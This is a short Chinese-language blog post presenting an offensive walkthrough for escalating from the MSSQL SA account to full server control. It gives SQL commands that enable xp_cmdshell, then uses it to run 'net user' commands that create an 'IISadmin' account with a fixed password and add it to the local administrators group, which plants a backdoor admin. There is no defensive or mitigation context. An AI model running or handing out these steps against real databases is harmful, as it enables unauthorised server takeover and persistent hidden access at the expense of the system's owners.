Jun 28 2019

MSSQL的SA账户提权获取服务器权限

作者: 绝缘体..   发布: 2019-06-28 11:39   分类: 首页   阅读:   抢沙发  
 
更多

这里要用到的就是xp_cmdshell这个存储过程,算是mssql有sa权限下的提权利器,不过有经验的管理员一般都会用各种牛逼的方法去禁止普通用户使用它

尝试用正常的方法打开xp_cmdshell: 

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC sp_configure

如图xp_cmdshell 开启成功

接下来添加用户 

EXEC xp_cmdshell 'net user IISadmin Qwer123456789 /add'
EXEC xp_cmdshell 'net user IISadmin /active:yes'
EXEC xp_cmdshell 'net localgroup administrators IISadmin /add'
打赏

本文固定链接: https://www.cxy163.net/archives/1721 | 绝缘体

该日志由 绝缘体.. 于 2019年06月28日 发表在 首页 分类下,
原创文章转载请注明: MSSQL的SA账户提权获取服务器权限 | 绝缘体
【上一篇】
【下一篇】

报歉!评论已关闭.